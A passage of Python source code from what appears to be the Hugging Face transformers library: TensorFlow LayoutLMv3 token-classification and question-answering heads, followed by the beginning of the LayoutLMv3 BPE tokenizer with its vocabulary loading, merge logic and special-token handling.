    @replace_return_docstrings(output_type=TFTokenClassifierOutput, config_class=_CONFIG_FOR_DOC)
    def call(
        self,
        input_ids: Optional[tf.Tensor] = None,
        bbox: Optional[tf.Tensor] = None,
        attention_mask: Optional[tf.Tensor] = None,
        token_type_ids: Optional[tf.Tensor] = None,
        position_ids: Optional[tf.Tensor] = None,
        head_mask: Optional[tf.Tensor] = None,
        inputs_embeds: Optional[tf.Tensor] = None,
        labels: Optional[tf.Tensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
        pixel_values: Optional[tf.Tensor] = None,
        training: Optional[bool] = False,
    ) -> Union[
        TFTokenClassifierOutput,
        Tuple[tf.Tensor],
        Tuple[tf.Tensor, tf.Tensor],
        Tuple[tf.Tensor, tf.Tensor, tf.Tensor],
        Tuple[tf.Tensor, tf.Tensor, tf.Tensor, tf.Tensor],
    ]:
        r"""
        labels (`tf.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
            Labels for computing the token classification loss. Indices should be in `[0, ..., config.num_labels - 1]`.

        Returns:

        Examples:

        ```python
        >>> from transformers import AutoProcessor, TFAutoModelForTokenClassification
        >>> from datasets import load_dataset

        >>> processor = AutoProcessor.from_pretrained("microsoft/layoutlmv3-base", apply_ocr=False)
        >>> model = TFAutoModelForTokenClassification.from_pretrained("microsoft/layoutlmv3-base", num_labels=7)

        >>> dataset = load_dataset("nielsr/funsd-layoutlmv3", split="train")
        >>> example = dataset[0]
        >>> image = example["image"]
        >>> words = example["tokens"]
        >>> boxes = example["bboxes"]
        >>> word_labels = example["ner_tags"]

        >>> encoding = processor(image, words, boxes=boxes, word_labels=word_labels, return_tensors="tf")

        >>> outputs = model(**encoding)
        >>> loss = outputs.loss
        >>> logits = outputs.logits
        ```"""
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict

        outputs = self.layoutlmv3(
            input_ids,
            bbox=bbox,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
            pixel_values=pixel_values,
            training=training,
        )
        # The text tokens occupy the first `seq_length` positions of the joint sequence.
        if input_ids is not None:
            input_shape = tf.shape(input_ids)
        else:
            input_shape = tf.shape(inputs_embeds)[:-1]

        seq_length = input_shape[1]
        # only take the text part of the output representations
        sequence_output = outputs[0][:, :seq_length]
        sequence_output = self.dropout(sequence_output, training=training)
        logits = self.classifier(sequence_output)

        loss = None if labels is None else self.hf_compute_loss(labels, logits)

        if not return_dict:
            # Re-pack as a plain tuple, prepending the loss when it was computed.
            output = (logits,) + outputs[1:]
            return ((loss,) + output) if loss is not None else output

        return TFTokenClassifierOutput(
            loss=loss,
            logits=logits,
            hidden_states=outputs.hidden_states,
            attentions=outputs.attentions,
        )

    # Copied from transformers.models.bert.modeling_tf_bert.TFBertForTokenClassification.serving_output
    def serving_output(self, output: TFTokenClassifierOutput) -> TFTokenClassifierOutput:
        # Convert the per-layer tuples into stacked tensors for SavedModel serving.
        hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
        attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None

        return TFTokenClassifierOutput(logits=output.logits, hidden_states=hs, attentions=attns)
@add_start_docstrings(
    """
    LayoutLMv3 Model with a span classification head on top for extractive question-answering tasks such as
    [DocVQA](https://rrc.cvc.uab.es/?ch=17) (a linear layer on top of the text part of the hidden-states output to
    compute `span start logits` and `span end logits`).
    """,
    LAYOUTLMV3_START_DOCSTRING,
)
class TFLayoutLMv3ForQuestionAnswering(TFLayoutLMv3PreTrainedModel, TFQuestionAnsweringLoss):
    # names with a '.' represents the authorized unexpected/missing layers when a TF model is loaded from a PT model
    _keys_to_ignore_on_load_unexpected = [r"position_ids"]

    def __init__(self, config: LayoutLMv3Config, **kwargs):
        super().__init__(config, **kwargs)

        self.num_labels = config.num_labels

        # Multimodal (text + image) backbone producing per-token hidden states.
        self.layoutlmv3 = TFLayoutLMv3MainLayer(config, name="layoutlmv3")
        # Head emitting 2 values per token: span-start and span-end logits.
        self.qa_outputs = TFLayoutLMv3ClassificationHead(config, name="qa_outputs")

    @unpack_inputs
    @add_start_docstrings_to_model_forward(LAYOUTLMV3_INPUTS_DOCSTRING)
    @replace_return_docstrings(output_type=TFQuestionAnsweringModelOutput, config_class=_CONFIG_FOR_DOC)
    def call(
        self,
        input_ids: Optional[tf.Tensor] = None,
        attention_mask: Optional[tf.Tensor] = None,
        token_type_ids: Optional[tf.Tensor] = None,
        position_ids: Optional[tf.Tensor] = None,
        head_mask: Optional[tf.Tensor] = None,
        inputs_embeds: Optional[tf.Tensor] = None,
        start_positions: Optional[tf.Tensor] = None,
        end_positions: Optional[tf.Tensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        bbox: Optional[tf.Tensor] = None,
        pixel_values: Optional[tf.Tensor] = None,
        return_dict: Optional[bool] = None,
        training: bool = False,
    ) -> Union[
        TFQuestionAnsweringModelOutput,
        Tuple[tf.Tensor],
        Tuple[tf.Tensor, tf.Tensor],
        Tuple[tf.Tensor, tf.Tensor, tf.Tensor],
        Tuple[tf.Tensor, tf.Tensor, tf.Tensor, tf.Tensor],
    ]:
        r"""
        start_positions (`tf.Tensor` of shape `(batch_size,)`, *optional*):
            Labels for position (index) of the start of the labelled span for computing the token classification loss.
            Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence
            are not taken into account for computing the loss.
        end_positions (`tf.Tensor` of shape `(batch_size,)`, *optional*):
            Labels for position (index) of the end of the labelled span for computing the token classification loss.
            Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence
            are not taken into account for computing the loss.

        Returns:

        Examples:

        ```python
        >>> from transformers import AutoProcessor, TFAutoModelForQuestionAnswering
        >>> from datasets import load_dataset
        >>> import tensorflow as tf

        >>> processor = AutoProcessor.from_pretrained("microsoft/layoutlmv3-base", apply_ocr=False)
        >>> model = TFAutoModelForQuestionAnswering.from_pretrained("microsoft/layoutlmv3-base")

        >>> dataset = load_dataset("nielsr/funsd-layoutlmv3", split="train")
        >>> example = dataset[0]
        >>> image = example["image"]
        >>> question = "what's his name?"
        >>> words = example["tokens"]
        >>> boxes = example["bboxes"]

        >>> encoding = processor(image, question, words, boxes=boxes, return_tensors="tf")
        >>> start_positions = tf.convert_to_tensor([1])
        >>> end_positions = tf.convert_to_tensor([3])

        >>> outputs = model(**encoding, start_positions=start_positions, end_positions=end_positions)
        >>> loss = outputs.loss
        >>> start_scores = outputs.start_logits
        >>> end_scores = outputs.end_logits
        ```"""
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict

        outputs = self.layoutlmv3(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
            bbox=bbox,
            pixel_values=pixel_values,
            training=training,
        )

        sequence_output = outputs[0]

        logits = self.qa_outputs(sequence_output, training=training)
        # Split the 2-channel head output into per-token start and end logits,
        # then drop the trailing singleton dimension.
        start_logits, end_logits = tf.split(value=logits, num_or_size_splits=2, axis=-1)
        start_logits = tf.squeeze(input=start_logits, axis=-1)
        end_logits = tf.squeeze(input=end_logits, axis=-1)
        loss = None

        if start_positions is not None and end_positions is not None:
            # hf_compute_loss expects the labels under these exact dict keys.
            labels = {"start_position": start_positions}
            labels["end_position"] = end_positions
            loss = self.hf_compute_loss(labels, logits=(start_logits, end_logits))

        if not return_dict:
            # Tuple output: loss is prepended only when it was computed.
            output = (start_logits, end_logits) + outputs[1:]
            return ((loss,) + output) if loss is not None else output

        return TFQuestionAnsweringModelOutput(
            loss=loss,
            start_logits=start_logits,
            end_logits=end_logits,
            hidden_states=outputs.hidden_states,
            attentions=outputs.attentions,
        )

    # Copied from transformers.models.bert.modeling_tf_bert.TFBertForQuestionAnswering.serving_output
    def serving_output(self, output: TFQuestionAnsweringModelOutput) -> TFQuestionAnsweringModelOutput:
        # Tuples of tensors are stacked into single tensors for graph serving.
        hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
        attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None

        return TFQuestionAnsweringModelOutput(
            start_logits=output.start_logits, end_logits=output.end_logits, hidden_states=hs, attentions=attns
        )
|
27182812/ChatGLM-LLaMA-chinese-insturct | 72,784 | src/transformers/models/layoutlmv3/tokenization_layoutlmv3.py | # coding=utf-8
# Copyright The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tokenization class for LayoutLMv3. Same as LayoutLMv2, but RoBERTa-like BPE tokenization instead of WordPiece."""
import json
import os
from functools import lru_cache
from typing import Dict, List, Optional, Tuple, Union
import regex as re
from ...tokenization_utils import AddedToken, PreTrainedTokenizer
from ...tokenization_utils_base import (
BatchEncoding,
EncodedInput,
PreTokenizedInput,
TextInput,
TextInputPair,
TruncationStrategy,
)
from ...utils import PaddingStrategy, TensorType, add_end_docstrings, logging
logger = logging.get_logger(__name__)
VOCAB_FILES_NAMES = {
"vocab_file": "vocab.json",
"merges_file": "merges.txt",
}
PRETRAINED_VOCAB_FILES_MAP = {
"vocab_file": {
"microsoft/layoutlmv3-base": "https://huggingface.co/microsoft/layoutlmv3-base/raw/main/vocab.json",
"microsoft/layoutlmv3-large": "https://huggingface.co/microsoft/layoutlmv3-large/raw/main/vocab.json",
},
"merges_file": {
"microsoft/layoutlmv3-base": "https://huggingface.co/microsoft/layoutlmv3-base/raw/main/merges.txt",
"microsoft/layoutlmv3-large": "https://huggingface.co/microsoft/layoutlmv3-large/raw/main/merges.txt",
},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
"microsoft/layoutlmv3-base": 512,
"microsoft/layoutlmv3-large": 512,
}
LAYOUTLMV3_ENCODE_KWARGS_DOCSTRING = r"""
add_special_tokens (`bool`, *optional*, defaults to `True`):
Whether or not to encode the sequences with the special tokens relative to their model.
padding (`bool`, `str` or [`~file_utils.PaddingStrategy`], *optional*, defaults to `False`):
Activates and controls padding. Accepts the following values:
- `True` or `'longest'`: Pad to the longest sequence in the batch (or no padding if only a single
sequence if provided).
- `'max_length'`: Pad to a maximum length specified with the argument `max_length` or to the maximum
acceptable input length for the model if that argument is not provided.
- `False` or `'do_not_pad'` (default): No padding (i.e., can output a batch with sequences of different
lengths).
truncation (`bool`, `str` or [`~tokenization_utils_base.TruncationStrategy`], *optional*, defaults to `False`):
Activates and controls truncation. Accepts the following values:
- `True` or `'longest_first'`: Truncate to a maximum length specified with the argument `max_length` or
to the maximum acceptable input length for the model if that argument is not provided. This will
truncate token by token, removing a token from the longest sequence in the pair if a pair of
sequences (or a batch of pairs) is provided.
- `'only_first'`: Truncate to a maximum length specified with the argument `max_length` or to the
maximum acceptable input length for the model if that argument is not provided. This will only
truncate the first sequence of a pair if a pair of sequences (or a batch of pairs) is provided.
- `'only_second'`: Truncate to a maximum length specified with the argument `max_length` or to the
maximum acceptable input length for the model if that argument is not provided. This will only
truncate the second sequence of a pair if a pair of sequences (or a batch of pairs) is provided.
- `False` or `'do_not_truncate'` (default): No truncation (i.e., can output batch with sequence lengths
greater than the model maximum admissible input size).
max_length (`int`, *optional*):
Controls the maximum length to use by one of the truncation/padding parameters.
If left unset or set to `None`, this will use the predefined model maximum length if a maximum length
is required by one of the truncation/padding parameters. If the model has no specific maximum input
length (like XLNet) truncation/padding to a maximum length will be deactivated.
stride (`int`, *optional*, defaults to 0):
If set to a number along with `max_length`, the overflowing tokens returned when
`return_overflowing_tokens=True` will contain some tokens from the end of the truncated sequence
returned to provide some overlap between truncated and overflowing sequences. The value of this
argument defines the number of overlapping tokens.
pad_to_multiple_of (`int`, *optional*):
If set will pad the sequence to a multiple of the provided value. This is especially useful to enable
the use of Tensor Cores on NVIDIA hardware with compute capability `>= 7.5` (Volta).
return_tensors (`str` or [`~file_utils.TensorType`], *optional*):
If set, will return tensors instead of list of python integers. Acceptable values are:
- `'tf'`: Return TensorFlow `tf.constant` objects.
- `'pt'`: Return PyTorch `torch.Tensor` objects.
- `'np'`: Return Numpy `np.ndarray` objects.
"""
LAYOUTLMV3_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING = r"""
add_special_tokens (`bool`, *optional*, defaults to `True`):
Whether or not to encode the sequences with the special tokens relative to their model.
padding (`bool`, `str` or [`~utils.PaddingStrategy`], *optional*, defaults to `False`):
Activates and controls padding. Accepts the following values:
- `True` or `'longest'`: Pad to the longest sequence in the batch (or no padding if only a single
sequence if provided).
- `'max_length'`: Pad to a maximum length specified with the argument `max_length` or to the maximum
acceptable input length for the model if that argument is not provided.
- `False` or `'do_not_pad'` (default): No padding (i.e., can output a batch with sequences of different
lengths).
truncation (`bool`, `str` or [`~tokenization_utils_base.TruncationStrategy`], *optional*, defaults to `False`):
Activates and controls truncation. Accepts the following values:
- `True` or `'longest_first'`: Truncate to a maximum length specified with the argument `max_length` or
to the maximum acceptable input length for the model if that argument is not provided. This will
truncate token by token, removing a token from the longest sequence in the pair if a pair of
sequences (or a batch of pairs) is provided.
- `'only_first'`: Truncate to a maximum length specified with the argument `max_length` or to the
maximum acceptable input length for the model if that argument is not provided. This will only
truncate the first sequence of a pair if a pair of sequences (or a batch of pairs) is provided.
- `'only_second'`: Truncate to a maximum length specified with the argument `max_length` or to the
maximum acceptable input length for the model if that argument is not provided. This will only
truncate the second sequence of a pair if a pair of sequences (or a batch of pairs) is provided.
- `False` or `'do_not_truncate'` (default): No truncation (i.e., can output batch with sequence lengths
greater than the model maximum admissible input size).
max_length (`int`, *optional*):
Controls the maximum length to use by one of the truncation/padding parameters. If left unset or set to
`None`, this will use the predefined model maximum length if a maximum length is required by one of the
truncation/padding parameters. If the model has no specific maximum input length (like XLNet)
truncation/padding to a maximum length will be deactivated.
stride (`int`, *optional*, defaults to 0):
If set to a number along with `max_length`, the overflowing tokens returned when
`return_overflowing_tokens=True` will contain some tokens from the end of the truncated sequence
returned to provide some overlap between truncated and overflowing sequences. The value of this
argument defines the number of overlapping tokens.
pad_to_multiple_of (`int`, *optional*):
If set will pad the sequence to a multiple of the provided value. This is especially useful to enable
the use of Tensor Cores on NVIDIA hardware with compute capability `>= 7.5` (Volta).
return_tensors (`str` or [`~utils.TensorType`], *optional*):
If set, will return tensors instead of list of python integers. Acceptable values are:
- `'tf'`: Return TensorFlow `tf.constant` objects.
- `'pt'`: Return PyTorch `torch.Tensor` objects.
- `'np'`: Return Numpy `np.ndarray` objects.
"""
@lru_cache()
def bytes_to_unicode():
    """
    Build the GPT-2 byte-to-unicode table: a dict mapping every byte value (0-255) to a printable
    unicode character.

    Printable bytes map to themselves; the remaining (whitespace/control) bytes are shifted past
    0xFF so that no entry is a character the BPE code would choke on. The mapping is reversible,
    which is all BPE needs, and covers the full byte range so no input ever becomes UNK.
    """
    printable = (
        list(range(ord("!"), ord("~") + 1))
        + list(range(ord("¡"), ord("¬") + 1))
        + list(range(ord("®"), ord("ÿ") + 1))
    )
    # Printable bytes keep their own codepoint.
    table = {byte: chr(byte) for byte in printable}
    # Everything else is assigned the next free codepoint above 255, in byte order.
    shift = 0
    for byte in range(2**8):
        if byte not in table:
            table[byte] = chr(2**8 + shift)
            shift += 1
    return table
def get_pairs(word):
    """
    Return set of symbol pairs in a word.

    Word is represented as tuple of symbols (symbols being variable-length strings).

    Args:
        word: Tuple of symbols.

    Returns:
        Set of adjacent `(left, right)` symbol pairs; empty for words shorter than 2 symbols.
    """
    # zip pairs each symbol with its successor. For len(word) < 2 this yields nothing,
    # which also fixes the IndexError the previous implementation raised on an empty word
    # (it unconditionally read word[0]).
    return set(zip(word, word[1:]))
class LayoutLMv3Tokenizer(PreTrainedTokenizer):
r"""
Construct a LayoutLMv3 tokenizer. Based on [`RoBERTatokenizer`] (Byte Pair Encoding or BPE).
[`LayoutLMv3Tokenizer`] can be used to turn words, word-level bounding boxes and optional word labels to
token-level `input_ids`, `attention_mask`, `token_type_ids`, `bbox`, and optional `labels` (for token
classification).
This tokenizer inherits from [`PreTrainedTokenizer`] which contains most of the main methods. Users should refer to
this superclass for more information regarding those methods.
[`LayoutLMv3Tokenizer`] runs end-to-end tokenization: punctuation splitting and wordpiece. It also turns the
word-level bounding boxes into token-level bounding boxes.
Args:
vocab_file (`str`):
Path to the vocabulary file.
merges_file (`str`):
Path to the merges file.
errors (`str`, *optional*, defaults to `"replace"`):
Paradigm to follow when decoding bytes to UTF-8. See
[bytes.decode](https://docs.python.org/3/library/stdtypes.html#bytes.decode) for more information.
bos_token (`str`, *optional*, defaults to `"<s>"`):
The beginning of sequence token that was used during pretraining. Can be used a sequence classifier token.
<Tip>
When building a sequence using special tokens, this is not the token that is used for the beginning of
sequence. The token used is the `cls_token`.
</Tip>
eos_token (`str`, *optional*, defaults to `"</s>"`):
The end of sequence token.
<Tip>
When building a sequence using special tokens, this is not the token that is used for the end of sequence.
The token used is the `sep_token`.
</Tip>
sep_token (`str`, *optional*, defaults to `"</s>"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
cls_token (`str`, *optional*, defaults to `"<s>"`):
The classifier token which is used when doing sequence classification (classification of the whole sequence
instead of per-token classification). It is the first token of the sequence when built with special tokens.
unk_token (`str`, *optional*, defaults to `"<unk>"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
pad_token (`str`, *optional*, defaults to `"<pad>"`):
The token used for padding, for example when batching sequences of different lengths.
mask_token (`str`, *optional*, defaults to `"<mask>"`):
The token used for masking values. This is the token used when training this model with masked language
modeling. This is the token which the model will try to predict.
add_prefix_space (`bool`, *optional*, defaults to `False`):
Whether or not to add an initial space to the input. This allows to treat the leading word just as any
other word. (RoBERTa tokenizer detect beginning of words by the preceding space).
cls_token_box (`List[int]`, *optional*, defaults to `[0, 0, 0, 0]`):
The bounding box to use for the special [CLS] token.
sep_token_box (`List[int]`, *optional*, defaults to `[0, 0, 0, 0]`):
The bounding box to use for the special [SEP] token.
pad_token_box (`List[int]`, *optional*, defaults to `[0, 0, 0, 0]`):
The bounding box to use for the special [PAD] token.
pad_token_label (`int`, *optional*, defaults to -100):
The label to use for padding tokens. Defaults to -100, which is the `ignore_index` of PyTorch's
CrossEntropyLoss.
only_label_first_subword (`bool`, *optional*, defaults to `True`):
Whether or not to only label the first subword, in case word labels are provided.
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
model_input_names = ["input_ids", "attention_mask", "bbox"]
    def __init__(
        self,
        vocab_file,
        merges_file,
        errors="replace",
        bos_token="<s>",
        eos_token="</s>",
        sep_token="</s>",
        cls_token="<s>",
        unk_token="<unk>",
        pad_token="<pad>",
        mask_token="<mask>",
        add_prefix_space=True,
        cls_token_box=[0, 0, 0, 0],
        sep_token_box=[0, 0, 0, 0],
        pad_token_box=[0, 0, 0, 0],
        pad_token_label=-100,
        only_label_first_subword=True,
        **kwargs,
    ):
        """Load the BPE vocabulary and merges, and set LayoutLMv3-specific defaults.

        See the class docstring for the meaning of every argument.
        """
        # Wrap plain-string special tokens in AddedToken so their lstrip/rstrip
        # behavior is explicit and survives serialization.
        bos_token = AddedToken(bos_token, lstrip=False, rstrip=False) if isinstance(bos_token, str) else bos_token
        eos_token = AddedToken(eos_token, lstrip=False, rstrip=False) if isinstance(eos_token, str) else eos_token
        sep_token = AddedToken(sep_token, lstrip=False, rstrip=False) if isinstance(sep_token, str) else sep_token
        cls_token = AddedToken(cls_token, lstrip=False, rstrip=False) if isinstance(cls_token, str) else cls_token
        unk_token = AddedToken(unk_token, lstrip=False, rstrip=False) if isinstance(unk_token, str) else unk_token
        pad_token = AddedToken(pad_token, lstrip=False, rstrip=False) if isinstance(pad_token, str) else pad_token

        # Mask token behave like a normal word, i.e. include the space before it
        mask_token = AddedToken(mask_token, lstrip=True, rstrip=False) if isinstance(mask_token, str) else mask_token

        super().__init__(
            errors=errors,
            bos_token=bos_token,
            eos_token=eos_token,
            unk_token=unk_token,
            sep_token=sep_token,
            cls_token=cls_token,
            pad_token=pad_token,
            mask_token=mask_token,
            add_prefix_space=add_prefix_space,
            cls_token_box=cls_token_box,
            sep_token_box=sep_token_box,
            pad_token_box=pad_token_box,
            pad_token_label=pad_token_label,
            only_label_first_subword=only_label_first_subword,
            **kwargs,
        )

        # encoder: token -> id from vocab.json; decoder is its inverse (id -> token).
        with open(vocab_file, encoding="utf-8") as vocab_handle:
            self.encoder = json.load(vocab_handle)
        self.decoder = {v: k for k, v in self.encoder.items()}
        self.errors = errors  # how to handle errors in decoding
        self.byte_encoder = bytes_to_unicode()
        self.byte_decoder = {v: k for k, v in self.byte_encoder.items()}
        # merges.txt lists one merge per line in priority order; the first line is
        # a version header and the last split element is empty, hence [1:-1].
        with open(merges_file, encoding="utf-8") as merges_handle:
            bpe_merges = merges_handle.read().split("\n")[1:-1]
        bpe_merges = [tuple(merge.split()) for merge in bpe_merges]
        self.bpe_ranks = dict(zip(bpe_merges, range(len(bpe_merges))))
        self.cache = {}  # memoizes bpe() results per token
        self.add_prefix_space = add_prefix_space

        # Should have added re.IGNORECASE so BPE merges can happen for capitalized versions of contractions
        self.pat = re.compile(r"""'s|'t|'re|'ve|'m|'ll|'d| ?\p{L}+| ?\p{N}+| ?[^\s\p{L}\p{N}]+|\s+(?!\S)|\s+""")

        # additional properties: bounding boxes / labels assigned to special and padding tokens
        self.cls_token_box = cls_token_box
        self.sep_token_box = sep_token_box
        self.pad_token_box = pad_token_box
        self.pad_token_label = pad_token_label
        self.only_label_first_subword = only_label_first_subword
    @property
    # Copied from transformers.models.roberta.tokenization_roberta.RobertaTokenizer.vocab_size
    def vocab_size(self):
        """Size of the base vocabulary (tokens added after loading are not counted)."""
        return len(self.encoder)
# Copied from transformers.models.roberta.tokenization_roberta.RobertaTokenizer.get_vocab
def get_vocab(self):
return dict(self.encoder, **self.added_tokens_encoder)
    # Copied from transformers.models.roberta.tokenization_roberta.RobertaTokenizer.bpe
    def bpe(self, token):
        """Apply byte-pair-encoding merges to a single byte-mapped token string.

        Repeatedly merges the adjacent symbol pair with the lowest merge rank until no
        rankable pair remains, then returns the symbols joined by single spaces.
        Results are memoized in `self.cache`.
        """
        if token in self.cache:
            return self.cache[token]
        word = tuple(token)
        pairs = get_pairs(word)

        if not pairs:
            return token

        while True:
            # Best merge = pair with the lowest rank; unknown pairs rank as +inf.
            bigram = min(pairs, key=lambda pair: self.bpe_ranks.get(pair, float("inf")))
            if bigram not in self.bpe_ranks:
                break
            first, second = bigram
            new_word = []
            i = 0
            while i < len(word):
                try:
                    # Copy everything up to the next occurrence of `first`.
                    j = word.index(first, i)
                except ValueError:
                    new_word.extend(word[i:])
                    break
                else:
                    new_word.extend(word[i:j])
                    i = j

                # Merge only when `first` is immediately followed by `second`;
                # otherwise keep the current symbol and advance by one.
                if word[i] == first and i < len(word) - 1 and word[i + 1] == second:
                    new_word.append(first + second)
                    i += 2
                else:
                    new_word.append(word[i])
                    i += 1
            new_word = tuple(new_word)
            word = new_word
            if len(word) == 1:
                # Fully merged; nothing left to pair up.
                break
            else:
                pairs = get_pairs(word)
        word = " ".join(word)
        self.cache[token] = word
        return word
# Copied from transformers.models.roberta.tokenization_roberta.RobertaTokenizer._tokenize
def _tokenize(self, text):
"""Tokenize a string."""
bpe_tokens = []
for token in re.findall(self.pat, text):
token = "".join(
self.byte_encoder[b] for b in token.encode("utf-8")
) # Maps all our bytes to unicode strings, avoiding control tokens of the BPE (spaces in our case)
bpe_tokens.extend(bpe_token for bpe_token in self.bpe(token).split(" "))
return bpe_tokens
# Copied from transformers.models.roberta.tokenization_roberta.RobertaTokenizer._convert_token_to_id
def _convert_token_to_id(self, token):
"""Converts a token (str) in an id using the vocab."""
return self.encoder.get(token, self.encoder.get(self.unk_token))
# Copied from transformers.models.roberta.tokenization_roberta.RobertaTokenizer._convert_id_to_token
def _convert_id_to_token(self, index):
"""Converts an index (integer) in a token (str) using the vocab."""
return self.decoder.get(index)
# Copied from transformers.models.roberta.tokenization_roberta.RobertaTokenizer.convert_tokens_to_string
def convert_tokens_to_string(self, tokens):
"""Converts a sequence of tokens (string) in a single string."""
text = "".join(tokens)
text = bytearray([self.byte_decoder[c] for c in text]).decode("utf-8", errors=self.errors)
return text
    # Copied from transformers.models.roberta.tokenization_roberta.RobertaTokenizer.save_vocabulary
    def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
        """Write vocab.json and merges.txt into `save_directory`.

        Returns the paths of the two written files, or None (with an error logged)
        when `save_directory` is not an existing directory.
        """
        if not os.path.isdir(save_directory):
            logger.error(f"Vocabulary path ({save_directory}) should be a directory")
            return
        vocab_file = os.path.join(
            save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["vocab_file"]
        )
        merge_file = os.path.join(
            save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["merges_file"]
        )

        with open(vocab_file, "w", encoding="utf-8") as f:
            f.write(json.dumps(self.encoder, indent=2, sort_keys=True, ensure_ascii=False) + "\n")

        index = 0
        with open(merge_file, "w", encoding="utf-8") as writer:
            writer.write("#version: 0.2\n")
            # Merges must be written in rank order; warn when ranks are not contiguous,
            # since the written file then no longer round-trips to the same ranks.
            for bpe_tokens, token_index in sorted(self.bpe_ranks.items(), key=lambda kv: kv[1]):
                if index != token_index:
                    logger.warning(
                        f"Saving vocabulary to {merge_file}: BPE merge indices are not consecutive."
                        " Please check that the tokenizer is not corrupted!"
                    )
                    index = token_index
                writer.write(" ".join(bpe_tokens) + "\n")
                index += 1

        return vocab_file, merge_file
# Copied from transformers.models.roberta.tokenization_roberta.RobertaTokenizer.build_inputs_with_special_tokens
def build_inputs_with_special_tokens(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
adding special tokens. A RoBERTa sequence has the following format:
- single sequence: `<s> X </s>`
- pair of sequences: `<s> A </s></s> B </s>`
Args:
token_ids_0 (`List[int]`):
List of IDs to which the special tokens will be added.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of [input IDs](../glossary#input-ids) with the appropriate special tokens.
"""
if token_ids_1 is None:
return [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
cls = [self.cls_token_id]
sep = [self.sep_token_id]
return cls + token_ids_0 + sep + sep + token_ids_1 + sep
# Copied from transformers.models.roberta.tokenization_roberta.RobertaTokenizer.get_special_tokens_mask
def get_special_tokens_mask(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None, already_has_special_tokens: bool = False
) -> List[int]:
"""
Retrieve sequence ids from a token list that has no special tokens added. This method is called when adding
special tokens using the tokenizer `prepare_for_model` method.
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
already_has_special_tokens (`bool`, *optional*, defaults to `False`):
Whether or not the token list is already formatted with special tokens for the model.
Returns:
`List[int]`: A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token.
"""
if already_has_special_tokens:
return super().get_special_tokens_mask(
token_ids_0=token_ids_0, token_ids_1=token_ids_1, already_has_special_tokens=True
)
if token_ids_1 is None:
return [1] + ([0] * len(token_ids_0)) + [1]
return [1] + ([0] * len(token_ids_0)) + [1, 1] + ([0] * len(token_ids_1)) + [1]
# Copied from transformers.models.roberta.tokenization_roberta.RobertaTokenizer.create_token_type_ids_from_sequences
def create_token_type_ids_from_sequences(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Create a mask from the two sequences passed to be used in a sequence-pair classification task. RoBERTa does not
make use of token type ids, therefore a list of zeros is returned.
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of zeros.
"""
sep = [self.sep_token_id]
cls = [self.cls_token_id]
if token_ids_1 is None:
return len(cls + token_ids_0 + sep) * [0]
return len(cls + token_ids_0 + sep + sep + token_ids_1 + sep) * [0]
def prepare_for_tokenization(self, text, is_split_into_words=False, **kwargs):
add_prefix_space = kwargs.pop("add_prefix_space", self.add_prefix_space)
# If the text starts with a token that should not be split, no space is added before the text in any case.
# It's necessary to match the fast tokenization
if (
(is_split_into_words or add_prefix_space)
and (len(text) > 0 and not text[0].isspace())
and sum([text.startswith(no_split_token) for no_split_token in self.unique_no_split_tokens]) == 0
):
text = " " + text
return (text, kwargs)
    @add_end_docstrings(LAYOUTLMV3_ENCODE_KWARGS_DOCSTRING, LAYOUTLMV3_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
    # Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2.LayoutLMv2Tokenizer.__call__
    def __call__(
        self,
        text: Union[TextInput, PreTokenizedInput, List[TextInput], List[PreTokenizedInput]],
